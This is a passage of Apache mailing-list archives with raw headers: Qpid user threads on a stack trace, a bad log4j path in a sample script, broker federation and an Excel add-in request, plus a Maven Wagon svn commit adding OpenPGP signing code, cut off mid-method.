org.apache.qpidity.transport.Channel.error(Channel.java:116) > > > > at > org.apache.qpidity.transport.Channel.error(Channel.java:41) > > > > at > > > org.apache.qpidity.transport.ProtocolError.delegate(ProtocolError.java:5 > > 9) > > > > at > org.apache.qpidity.transport.Channel.received(Channel.java:72) > > > > at > > > org.apache.qpidity.transport.Connection.received(Connection.java:82) > > > > at > > > org.apache.qpidity.transport.Connection.received(Connection.java:43) > > > > at > > > org.apache.qpidity.transport.network.Assembler.emit(Assembler.java:90) > > > > at > > > org.apache.qpidity.transport.network.Assembler.error(Assembler.java:134) > > > > at > > > org.apache.qpidity.transport.ProtocolError.delegate(ProtocolError.java:6 > > 4) > > > > at > > > org.apache.qpidity.transport.network.Assembler.received(Assembler.java:1 > > 00) > > > > at > > > org.apache.qpidity.transport.network.Assembler.received(Assembler.java:4 > > 9) > > > > at > > > org.apache.qpidity.transport.network.InputHandler.error(InputHandler.jav > > a:111) > > > > at > > > org.apache.qpidity.transport.network.InputHandler.expect(InputHandler.ja > > va:243) > > > > at > > > org.apache.qpidity.transport.network.InputHandler.expect(InputHandler.ja > > va:234) > > > > at > > > org.apache.qpidity.transport.network.InputHandler.next(InputHandler.java > > :126) > > > > at > > > org.apache.qpidity.transport.network.InputHandler.received(InputHandler. > > java:118) > > > > at > > > org.apache.qpidity.transport.network.InputHandler.received(InputHandler. > > java:41) > > > > at > > > org.apache.qpidity.transport.network.mina.MinaHandler.messageReceived(Mi > > naHandler.java:74) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain$TailFilter.messageR > > eceived(AbstractIoFilterChain.java:703) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain.callNextMessageRece > > ived(AbstractIoFilterChain.java:362) > > > > ... 11 more > > > > > > Any idea what could be causing this? > > > > > > Thanks > > > > > > -Shahbaz > > > > > > > > > > From [email protected] Fri Apr 25 09:20:50 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52909 invoked from network); 25 Apr 2008 09:20:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Apr 2008 09:20:50 -0000 Received: (qmail 90551 invoked by uid 500); 25 Apr 2008 09:20:51 -0000 Delivered-To: [email protected] Received: (qmail 90539 invoked by uid 500); 25 Apr 2008 09:20:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90528 invoked by uid 99); 25 Apr 2008 09:20:51 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 02:20:51 -0700 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO relay03.pair.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 25 Apr 2008 09:20:05 +0000 Received: (qmail 94376 invoked from network); 25 Apr 2008 09:20:17 -0000 Received: from unknown (HELO ?161.129.204.104?) (unknown) by unknown with SMTP; 25 Apr 2008 09:20:17 -0000 X-pair-Authenticated: 161.129.204.104 Message-ID: <[email protected]> Date: Fri, 25 Apr 2008 14:50:16 +0530 From: Suran Jayathilaka <[email protected]> Organization: WSO2 User-Agent: Thunderbird 161.129.204.104 (X11/20080227) MIME-Version: 1.0 To: [email protected] Subject: Missing log4j.xml file when running samples X-Enigmail-Version: 0.95.6 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Hi, I'm in the middle of running the sample classes and came across this. e.g. When invoking (or other classes) $QPID_SRC_HOME/java/client/example/target/classes$ sh runSample.sh org.apache.qpid.example.amqpexample.direct.Listener throws log4j:ERROR Could not parse url [file:/usr/share/doc/rhm-0.2/java/log4j.xml]. java.io.FileNotFoundException: /usr/share/doc/rhm-0.2/java/log4j.xml (No such file or directory) at java.io.FileInputStream.open(Native Method) at java.io.FileInputStream.<init>(FileInputStream.java:106) at java.io.FileInputStream.<init>(FileInputStream.java:66) at........... I see line 26 of runSample.sh sets the default value of QPID_SAMPLE to "/usr/share/doc/rhm-0.2", and line 46 sets QPID_PARAM="$QPID_PARAM -Dlog4j.configuration=file://$QPID_SAMPLE/java/log4j.xml", which causes the above. Why is this so? Why not set the default location of the log4j config file to $QPID_HOME/etc/log4j.xml which does have such a file? Also, should the availability of rhm be pre-assumed? Thanks. Suran From [email protected] Fri Apr 25 10:12:49 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70475 invoked from network); 25 Apr 2008 10:12:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Apr 2008 10:12:49 -0000 Received: (qmail 47984 invoked by uid 500); 25 Apr 2008 10:12:51 -0000 Delivered-To: [email protected] Received: (qmail 47878 invoked by uid 500); 25 Apr 2008 10:12:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47855 invoked by uid 99); 25 Apr 2008 10:12:50 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 03:12:50 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wf-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 10:12:02 +0000 Received: by wf-out-1314.google.com with SMTP id 23so3991913wfg.21 for <[email protected]>; Fri, 25 Apr 2008 03:12:16 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=hPcPOEnCsVlYbh1Imccli3ShrXGCrwOhL+PzFYiSxhU=; b=jDtFs7VAwW8z3x8zHacHbzBD9f8x6yI20VD5e6Xa8Rz7ot8pTHxFsLA/sxQqoyvJsbinvcKamsqcqp33ymr2I/vnXk4UKIk/z18ckjxyiTqZ3ub5k+3QmObybyKCGeMCjGz3TSqp1NMY/oM8peytxzSYkf7sZdR12xipDCjx15U= DomainKey-Signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=gamma; h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=bD+ymXvBNEk4yXAA2xUkIUE+JmqsOuTj4wtNtIl//s4quu6Fr0ikEMOoQu6ofaivLcNe3kLIjwORWp7vWXkONx8WgjYHenyvPaHBJkMeUbeUFaDQimtazJdf/c9IVUutjZKk+v0C/FQGfUcGkTDGIknbyKcBLOdfNo6Of8Q/bcM= Received: by 161.129.204.104 with SMTP id e20mr935501wfh.187.1209118336159; Fri, 25 Apr 2008 03:12:16 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 25 Apr 2008 03:12:16 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 25 Apr 2008 11:12:16 +0100 From: "Marnie McCormack" <[email protected]> To: [email protected] Subject: Re: Missing log4j.xml file when running samples In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_4717_4109385.1209118336169" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_4717_4109385.1209118336169 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi Suran, You're quite correct - the setting of $QPID_SAMPLE in this script is erroneous, and probably simple developer error. Can you kindly raise as a JIRA and we can address, please ? Thanks & Regards, Marnie On 4/25/08, Suran Jayathilaka <[email protected]> wrote: > > Hi, > > I'm in the middle of running the sample classes and came across this. > e.g. When invoking (or other classes) > > $QPID_SRC_HOME/java/client/example/target/classes$ sh runSample.sh > org.apache.qpid.example.amqpexample.direct.Listener > > throws > > log4j:ERROR Could not parse url > [file:/usr/share/doc/rhm-0.2/java/log4j.xml]. > java.io.FileNotFoundException: /usr/share/doc/rhm-0.2/java/log4j.xml (No > such file or directory) > at java.io.FileInputStream.open(Native Method) > at java.io.FileInputStream.<init>(FileInputStream.java:106) > at java.io.FileInputStream.<init>(FileInputStream.java:66) > at........... > > I see line 26 of runSample.sh sets the default value of QPID_SAMPLE to > "/usr/share/doc/rhm-0.2", and line 46 > sets > QPID_PARAM="$QPID_PARAM > -Dlog4j.configuration=file://$QPID_SAMPLE/java/log4j.xml", > which causes the above. > Why is this so? Why not set the default location of the log4j config file > to $QPID_HOME/etc/log4j.xml which does have such a file? > Also, should the availability of rhm be pre-assumed? > > Thanks. > Suran > > > ------=_Part_4717_4109385.1209118336169-- From [email protected] Fri Apr 25 15:30:58 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47417 invoked from network); 25 Apr 2008 15:30:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Apr 2008 15:30:57 -0000 Received: (qmail 56238 invoked by uid 500); 25 Apr 2008 15:30:59 -0000 Delivered-To: [email protected] Received: (qmail 56140 invoked by uid 500); 25 Apr 2008 15:30:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56091 invoked by uid 99); 25 Apr 2008 15:30:58 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 08:30:58 -0700 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mx1.redhat.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 15:30:15 +0000 Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [161.129.204.104]) by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m3PFTxQO005583; Fri, 25 Apr 2008 11:29:59 -0400 Received: from mail.boston.redhat.com (mail.boston.redhat.com [161.129.204.104]) by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m3PFTxpg029687; Fri, 25 Apr 2008 11:29:59 -0400 Received: from localhost.localdomain (dhcp83-31.boston.redhat.com [161.129.204.104]) by mail.boston.redhat.com (8.13.1/8.13.1) with ESMTP id m3PFTwK1009387; Fri, 25 Apr 2008 11:29:59 -0400 Message-ID: <[email protected]> Date: Fri, 25 Apr 2008 11:27:59 -0400 From: Carl Trieloff <[email protected]> Reply-To: [email protected] Organization: Red Hat User-Agent: Thunderbird 161.129.204.104 (X11/20080226) MIME-Version: 1.0 To: [email protected], [email protected] Subject: Re: Federation & Clustering References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Scanned-By: MIMEDefang 2.58 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org Gordon Sim wrote: > Regarding federation, what we have now in the c++ broker is really > inter-broker routing. Links between brokers can be setup to transfer > messages from one to another. > > In the current terminology a 'link' is a connection between two > brokers. Such a link is setup using the management system, by asking > one broker to establish a connection to another broker given the host > and port. > > Once a link is established, a 'bridge' can be created. A bridge is > essentially a subscription for messages between two brokers, > requesting the transfer of messages from a source to a > destination. The 'source' for a bridge can logically be either an > exchange or a queue; the destination is an exchange on the receiving > broker. > > The current implementation of bridges relies on the symmetry of the > message.transfer command in the 0-10 AMQP specification. A bridge is > created by issuing a subscribe request to one broker using the > exchange name to which the messages should be delivered as the > 'destination' argument. So once the subscription is setup the bridge > apperas to be a standard consumer to the source broker and messages > routed from that broker appear as standard publications at the source > broker. > > If the logical source of the bridge was an exchange rather than a > queue, an exclusive queue is created for the bridge and bound with the > relevant binding details (currently only a binding key is supported, > but thats easy to extend). > > Bridges can be established to support different types of message > flow. A common case is where you have two or more brokers over which > you want to offer a 'federated exchange'. I.e. you want messages > published to that exchange on one broker to be routed through the > equivalent exchanges on all the brokers in the federation, allowing > queues bund locally at those brokers to receive such messages. This > common case is supported by the qpid-route tool. > > There are currently a few outstanding issues needing to be resolved. > > One is preventing messages from looping in configurations where there > are circularities in the defined routes (such as those described for > the 'federated exchange'). I plan to address that next week. The > solution I have in mind is to have the exclusive queues used form > bridging from exchanges append an identifier to a custom property > ('x-qpid-route' or whatever) in each message that passes through > them. It will then be possible to specify a list of exclusions when > establishing a bridge and messages where the route property contains > any of the excluded identifiers will be silently dropped. I'm not > entirely delighted with that approach, but it will have to do in the > short term I think. > > Another is ensuring that links are re-established when lost (e.g. due > to network failures or brokers being taken down) and that the details > of configured bridges survive restart. These will also be addressed > quite soon I hope. > > This is obviously just the beginning of full federation > capabilities. There are many ways it can be made more sophisticated > and I for one would be interested in debating ideas, use cases and > directions. I have added this page -- with text above http://cwiki.apache.org/confluence/display/qpid/Federation+Design+Note We can link topics/ etc around Federation from this page. I have also cross posted to our users-list -- so that we can get input from any users that have interest in the topic The route tool Gordon mentions is shown here http://cwiki.apache.org/confluence/pages/viewpage.action?pageId=82403 Users are welcome to add any requirements/ comments.... regards Carl. From [email protected] Fri Apr 25 18:18:46 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20846 invoked from network); 25 Apr 2008 18:18:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Apr 2008 18:18:46 -0000 Received: (qmail 13838 invoked by uid 500); 25 Apr 2008 18:18:47 -0000 Delivered-To: [email protected] Received: (qmail 13822 invoked by uid 500); 25 Apr 2008 18:18:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13811 invoked by uid 99); 25 Apr 2008 18:18:47 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 11:18:47 -0700 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mx1.redhat.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 18:17:55 +0000 Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [161.129.204.104]) by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m3PIIG83022562 for <[email protected]>; Fri, 25 Apr 2008 14:18:16 -0400 Received: from mail.boston.redhat.com (mail.boston.redhat.com [161.129.204.104]) by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m3PIIFve014146 for <[email protected]>; Fri, 25 Apr 2008 14:18:15 -0400 Received: from localhost.localdomain (dhcp83-31.boston.redhat.com [161.129.204.104]) by mail.boston.redhat.com (8.13.1/8.13.1) with ESMTP id m3PIIElR009632 for <[email protected]>; Fri, 25 Apr 2008 14:18:15 -0400 Message-ID: <[email protected]> Date: Fri, 25 Apr 2008 14:16:14 -0400 From: Carl Trieloff <[email protected]> Reply-To: [email protected] Organization: Red Hat User-Agent: Thunderbird 161.129.204.104 (X11/20080226) MIME-Version: 1.0 To: [email protected] Subject: Re: Excel (RTD) add-in? References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Scanned-By: MIMEDefang 2.58 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org Shahbaz Chaudhary wrote: > I'm surprised to see that there isn't an Excel add-in yet for Qpid or > any other AMQP implementation. Are there any plans to develop one? > > Such an add-in would be fantastically useful! > > Hopefully some COM programmers will take note :) > If anyone also wants to help contribute and update the .NET (C#) client to AMQP 0-10, all contributions welcome. Carl.
From [email protected] Fri Dec 09 00:21:01 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 83623 invoked from network); 9 Dec 2005 00:21:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Dec 2005 00:21:01 -0000 Received: (qmail 65607 invoked by uid 500); 9 Dec 2005 00:21:00 -0000 Delivered-To: [email protected] Received: (qmail 65579 invoked by uid 500); 9 Dec 2005 00:21:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <wagon-commits.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 65565 invoked by uid 99); 9 Dec 2005 00:21:00 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Dec 2005 16:21:00 -0800 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 08 Dec 2005 16:20:59 -0800 Received: (qmail 83571 invoked by uid 65534); 9 Dec 2005 00:20:38 -0000 Message-ID: <[email protected]> Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r355292 - in /maven/wagon/trunk: ./ wagon-openpgp/ wagon-openpgp/src/ wagon-openpgp/src/main/ wagon-openpgp/src/main/java/ wagon-openpgp/src/main/java/org/ wagon-openpgp/src/main/java/org/apache/ wagon-openpgp/src/main/java/org/apache/maven... Date: Fri, 09 Dec 2005 00:20:36 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.5 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: brett Date: Thu Dec 8 16:20:31 2005 New Revision: 355292 URL: http://svn.apache.org/viewcvs?rev=355292&view=rev Log: open pgp suppoprt for wagon Added: maven/wagon/trunk/wagon-openpgp/ (with props) maven/wagon/trunk/wagon-openpgp/pom.xml (with props) maven/wagon/trunk/wagon-openpgp/src/ maven/wagon/trunk/wagon-openpgp/src/main/ maven/wagon/trunk/wagon-openpgp/src/main/java/ maven/wagon/trunk/wagon-openpgp/src/main/java/org/ maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/ maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/ maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/ maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/ maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignatureVerifierObserver.java (with props) maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignerObserver.java (with props) maven/wagon/trunk/wagon-openpgp/src/test/ maven/wagon/trunk/wagon-openpgp/src/test/java/ maven/wagon/trunk/wagon-openpgp/src/test/java/org/ maven/wagon/trunk/wagon-openpgp/src/test/java/org/apache/ maven/wagon/trunk/wagon-openpgp/src/test/java/org/apache/maven/ maven/wagon/trunk/wagon-openpgp/src/test/java/org/apache/maven/wagon/ maven/wagon/trunk/wagon-openpgp/src/test/java/org/apache/maven/wagon/openpgp/ maven/wagon/trunk/wagon-openpgp/src/test/java/org/apache/maven/wagon/openpgp/WagonOpenPgpObserverTest.java (with props) maven/wagon/trunk/wagon-openpgp/src/test/resources/ maven/wagon/trunk/wagon-openpgp/src/test/resources/pubring.gpg - copied unchanged from r354611, jakarta/commons/sandbox/openpgp/trunk/src/test/resources/pubring.gpg maven/wagon/trunk/wagon-openpgp/src/test/resources/secring.gpg - copied unchanged from r354611, jakarta/commons/sandbox/openpgp/trunk/src/test/resources/secring.gpg maven/wagon/trunk/wagon-openpgp/src/test/resources/test-input.txt - copied unchanged from r354611, jakarta/commons/sandbox/openpgp/trunk/src/test/resources/test-input.txt maven/wagon/trunk/wagon-openpgp/src/test/resources/test-signature.bpg - copied unchanged from r354747, jakarta/commons/sandbox/openpgp/trunk/src/test/resources/test-signature.bpg maven/wagon/trunk/wagon-provider-api/src/main/java/org/apache/maven/wagon/observers/AbstractTransferListener.java (with props) Modified: maven/wagon/trunk/pom.xml Modified: maven/wagon/trunk/pom.xml URL: http://svn.apache.org/viewcvs/maven/wagon/trunk/pom.xml?rev=355292&r1=355291&r2=355292&view=diff ============================================================================== --- maven/wagon/trunk/pom.xml (original) +++ maven/wagon/trunk/pom.xml Thu Dec 8 16:20:31 2005 @@ -9,7 +9,7 @@ <issueManagement> <system>jira</system> <url>http://jira.codehaus.org/browse/WAGON</url> - </issueManagement> + </issueManagement> <ciManagement> <system>[email protected]</system> <notifiers> @@ -93,6 +93,7 @@ <module>wagon-provider-api</module> <module>wagon-provider-test</module> <module>wagon-providers</module> + <module>wagon-openpgp</module> </modules> <dependencies> <dependency> Propchange: maven/wagon/trunk/wagon-openpgp/ ------------------------------------------------------------------------------ --- svn:ignore (added) +++ svn:ignore Thu Dec 8 16:20:31 2005 @@ -0,0 +1,4 @@ +target +*.iws +*.ipr +*.iml Added: maven/wagon/trunk/wagon-openpgp/pom.xml URL: http://svn.apache.org/viewcvs/maven/wagon/trunk/wagon-openpgp/pom.xml?rev=355292&view=auto ============================================================================== --- maven/wagon/trunk/wagon-openpgp/pom.xml (added) +++ maven/wagon/trunk/wagon-openpgp/pom.xml Thu Dec 8 16:20:31 2005 @@ -0,0 +1,48 @@ +<project> + <parent> + <artifactId>wagon</artifactId> + <groupId>org.apache.maven.wagon</groupId> + <version>1.0-alpha-6-SNAPSHOT</version> + </parent> + <modelVersion>4.0.0</modelVersion> + <artifactId>wagon-openpgp</artifactId> + <name>Maven Wagon OpenPGP Integration</name> + <version>1.0-alpha-6-SNAPSHOT</version> + <dependencies> + <dependency> + <groupId>org.apache.maven.wagon</groupId> + <artifactId>wagon-provider-api</artifactId> + <version>1.0-alpha-6-SNAPSHOT</version> + </dependency> + <dependency> + <groupId>org.apache.maven.wagon</groupId> + <artifactId>wagon-provider-test</artifactId> + <version>1.0-alpha-6-SNAPSHOT</version> + <scope>test</scope> + </dependency> + <dependency> + <groupId>org.apache.maven.wagon</groupId> + <artifactId>wagon-file</artifactId> + <version>1.0-alpha-6-SNAPSHOT</version> + <scope>test</scope> + </dependency> + <dependency> + <groupId>org.codehaus.plexus</groupId> + <artifactId>plexus-container-default</artifactId> + <version>1.0-alpha-8</version> + <scope>test</scope> + </dependency> + <dependency> + <groupId>org.apache.commons</groupId> + <artifactId>commons-openpgp</artifactId> + <version>1.0-SNAPSHOT</version> + </dependency> + </dependencies> + <!-- Until commons-pgp has a release --> + <repositories> + <repository> + <id>apache.snapshots</id> + <url>http://cvs.apache.org/maven-snapshot-repository</url> + </repository> + </repositories> +</project> Propchange: maven/wagon/trunk/wagon-openpgp/pom.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: maven/wagon/trunk/wagon-openpgp/pom.xml ------------------------------------------------------------------------------ svn:executable = * Propchange: maven/wagon/trunk/wagon-openpgp/pom.xml ------------------------------------------------------------------------------ svn:keywords = "Author Date Id Revision" Added: maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignatureVerifierObserver.java URL: http://svn.apache.org/viewcvs/maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignatureVerifierObserver.java?rev=355292&view=auto ============================================================================== --- maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignatureVerifierObserver.java (added) +++ maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignatureVerifierObserver.java Thu Dec 8 16:20:31 2005 @@ -0,0 +1,87 @@ +package org.apache.maven.wagon.openpgp; + +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +import org.apache.commons.openpgp.BouncyCastleOpenPgpStreamingSignatureVerifier; +import org.apache.commons.openpgp.KeyRing; +import org.apache.commons.openpgp.OpenPgpException; +import org.apache.commons.openpgp.OpenPgpStreamingSignatureVerifier; +import org.apache.commons.openpgp.SignatureStatus; +import org.apache.maven.wagon.events.TransferEvent; +import org.apache.maven.wagon.observers.AbstractTransferListener; + +import java.io.IOException; +import java.io.InputStream; + +/** + * Listener to the upload process that can sign the artifact. + * + * @author <a href="mailto:[email protected]">Brett Porter</a> + * @todo handle non-detached + * @todo does this need to handle reset in transferStarted so it can be reused? + */ +public class WagonOpenPgpSignatureVerifierObserver + extends AbstractTransferListener +{ + private final OpenPgpStreamingSignatureVerifier verifier; + + private SignatureStatus status; + + public WagonOpenPgpSignatureVerifierObserver( InputStream inputStream, KeyRing keyRing, boolean asciiArmored ) + throws OpenPgpException, IOException + { + verifier = new BouncyCastleOpenPgpStreamingSignatureVerifier( inputStream, keyRing, asciiArmored ); + } + + public void transferInitiated( TransferEvent transferEvent ) + { + this.status = null; + } + + public void transferProgress( TransferEvent transferEvent, byte[] buffer, int length ) + { + try + { + verifier.update( buffer, 0, length ); + } + catch ( OpenPgpException e ) + { + // TODO: record the error in some way + } + } + + public void transferCompleted( TransferEvent transferEvent ) + { + try + { + status = verifier.finish(); + } + catch ( OpenPgpException e ) + { + // TODO: record the error in some way + } + catch ( IOException e ) + { + // TODO: record the error in some way + } + } + + public SignatureStatus getStatus() + { + return status; + } +} Propchange: maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignatureVerifierObserver.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignatureVerifierObserver.java ------------------------------------------------------------------------------ svn:keywords = Author Date Id Revision Added: maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignerObserver.java URL: http://svn.apache.org/viewcvs/maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignerObserver.java?rev=355292&view=auto ============================================================================== --- maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignerObserver.java (added) +++ maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignerObserver.java Thu Dec 8 16:20:31 2005 @@ -0,0 +1,85 @@ +package org.apache.maven.wagon.openpgp; + +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +import org.apache.commons.openpgp.BouncyCastleOpenPgpStreamingSigner; +import org.apache.commons.openpgp.KeyRing; +import org.apache.commons.openpgp.OpenPgpException; +import org.apache.commons.openpgp.OpenPgpStreamingSigner; +import org.apache.maven.wagon.events.TransferEvent; +import org.apache.maven.wagon.observers.AbstractTransferListener; + +import java.io.IOException; + +/** + * Listener to the upload process that can sign the artifact. + * + * @author <a href="mailto:[email protected]">Brett Porter</a> + * @todo handle non-detached + * @todo does this need to handle reset in transferStarted so it can be reused? + */ +public class WagonOpenPgpSignerObserver + extends AbstractTransferListener +{ + private final OpenPgpStreamingSigner signer; + + private byte[] actualSignature; + + public WagonOpenPgpSignerObserver( String keyId, KeyRing keyRing, boolean asciiArmored ) + throws OpenPgpException + { + signer = new BouncyCastleOpenPgpStreamingSigner( keyId, keyRing, asciiArmored ); + } + + public void transferInitiated( TransferEvent transferEvent ) + { + this.actualSignature = null; + } + + public void transferProgress( TransferEvent transferEvent, byte[] buffer, int length ) + { + try + { + signer.update( buffer, 0, length ); + } + catch ( OpenPgpException e ) + { + // TODO: record the error in some way + } + } + + public void transferCompleted( TransferEvent transferEvent ) + { + try + { + 